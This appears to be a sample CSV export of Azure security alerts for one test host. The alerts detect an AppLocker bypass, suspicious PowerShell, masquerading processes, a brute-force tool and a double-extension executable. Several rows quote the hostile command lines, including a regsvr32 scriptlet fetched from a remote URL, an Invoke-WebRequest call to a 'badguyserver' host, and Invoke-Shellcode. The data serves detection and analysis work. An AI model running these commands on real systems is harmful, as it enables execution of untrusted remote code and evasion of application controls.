132,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,f3490cf7-a303-4001-b7d6-8acf7e83f191,2518547480989617678_f3490cf7-a303-4001-b7d6-8acf7e83f191,Detection,Microsoft,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,Potential attempt to bypass AppLocker detected,"Analysis of host data on MSTICALERTSWIN1 detected a potential attempt to bypass AppLocker restrictions. AppLocker can be configured to implement a policy that limits what executables are allowed to run on a Windows system. The command line pattern similar to that identified in this alert has been previously associated with attacker attempts to circumvent AppLocker policy by using trusted executables (allowed by AppLocker policy) to execute untrusted code. This could be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x16f0"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x16f0"",
""CommandLine"": "".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.0382321Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.0382321Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.0382321Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:03,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
133,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,c0558adc-b4a9-4289-b9ad-7e7260f1cde0,2518547480970182118_c0558adc-b4a9-4289-b9ad-7e7260f1cde0,Detection,Microsoft,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,Detected anomalous mix of upper and lower case characters in command-line,"Analysis of host data on MSTICALERTSWIN1 detected a command-line with anomalous mix of upper and lower case characters. This kind of pattern, while possibly benign, is also typical of attackers trying to hide from case-sensitive or hash-based rule matching when performing administrative tasks on a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\rundll32.exe"",
""Suspicious Command Line"": "".\\rundll32 /c shell32control_randll.dll"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x11f8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""rundll32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x11f8"",
""CommandLine"": "".\\rundll32 /c shell32control_randll.dll"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.9817881Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.9817881Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.9817881Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
134,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,24a6d6f3-acf1-41bd-a11f-01a1369bac02,2518547480982973701_24a6d6f3-acf1-41bd-a11f-01a1369bac02,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-reversednslookup.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1378"",
""Suspicious Script"": "".\\powershell Invoke-ReverseDnsLookup.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1378"",
""CommandLine"": "".\\powershell invoke-reversednslookup.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.7026298Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.7026298Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.7026298Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
135,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:04,2019-01-15 11:45:04,b66e93d7-b38b-4785-baa5-093edc18e649,2518547480956885358_b66e93d7-b38b-4785-baa5-093edc18e649,Detection,Microsoft,Random process name detected,Random process name detected,Random process name detected,Suspiciously constructed process name detected: c:\diagnostics\systmp\sdopfjiowtbkjfnbeioruj.exe,Informational,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\sdopfjiowtbkjfnbeioruj.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\systmp\\sdopfjiowtbkjfnbeioruj.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x176c"",
""ModelScore"": ""-21.83"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""sdopfjiowtbkjfnbeioruj.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x176c"",
""CommandLine"": ""c:\\diagnostics\\systmp\\sdopfjiowtbkjfnbeioruj.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:04.3114641Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:04.3114641Z"",
""EndTimeUtc"": ""2019-01-15T11:45:04.3114641Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
136,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,d46877bd-e04d-401a-99bd-eec2a6b25663,2518547480984263491_d46877bd-e04d-401a-99bd-eec2a6b25663,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1410"",
""Suspicious Script"": "".\\powershell -Noninteractive -Noprofile -Command \""Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"""",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1410"",
""CommandLine"": "".\\powershell -noninteractive -noprofile -command \""invoke-expression get-process; invoke-webrequest -uri http://badguyserver/pwnme\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.5736508Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.5736508Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.5736508Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
137,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,492fbb97-a1fc-4880-95d2-e55ab2f142b6,2518547480977057409_492fbb97-a1fc-4880-95d2-e55ab2f142b6,Detection,Microsoft,Suspicious system process executed,Suspicious system process executed,Suspicious system process executed,The system process c:\windows\fonts\csrss.exe was observed running in an abnormal context. Malware often uses this process name to masquerade its malicious activity.,Medium,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\windows\\fonts\\csrss.exe"",
""command line"": ""c:\\windows\\fonts\\csrss.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x15e8"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""System Process"": ""CSRSS.EXE"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15e8"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
138,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:03,2019-01-15 11:45:03,88eb8a87-a876-46aa-b8ed-be7298929ea8,2518547480968677354_88eb8a87-a876-46aa-b8ed-be7298929ea8,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,Machine logs indicate that the suspicious process: 'c:\diagnostics\systmp\dubrute.exe' was running on the machine; this process is associated with carrying out brute force attacks. An attacker may have compromised this host as a launchpad for carrying out further attacks.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\dubrute.exe"",
""Suspicious Command Line"": "".\\dubrute.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1604"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""dubrute.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1604"",
""CommandLine"": "".\\dubrute.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:03.1322645Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:03.1322645Z"",
""EndTimeUtc"": ""2019-01-15T11:45:03.1322645Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
139,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:04,2019-01-15 11:45:04,2b59c1d5-a815-4562-a8d4-36d9777e6546,2518547480956378190_2b59c1d5-a815-4562-a8d4-36d9777e6546,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\diagnostics\\systmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\systmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x15dc"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=fnAjscV5Un28sgEeHYRuQ8blKChnbCPuuVZzNMfJEH8%3D&spr=https&st=2019-01-14T15:33:03Z&se=2019-04-14T15:48:03Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15dc"",
""CommandLine"": ""c:\\diagnostics\\systmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:04.3621809Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:04.3621809Z"",
""EndTimeUtc"": ""2019-01-15T11:45:04.3621809Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
140,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,9da8e3df-9c3b-4e20-8bd0-ace00aff9def,2518547480983467170_9da8e3df-9c3b-4e20-8bd0-ace00aff9def,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell invoke-shellcode.ps1"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xe68"",
""Suspicious Script"": "".\\powershell Invoke-Shellcode.ps1"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xe68"",
""CommandLine"": "".\\powershell invoke-shellcode.ps1"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.6532829Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.6532829Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.6532829Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
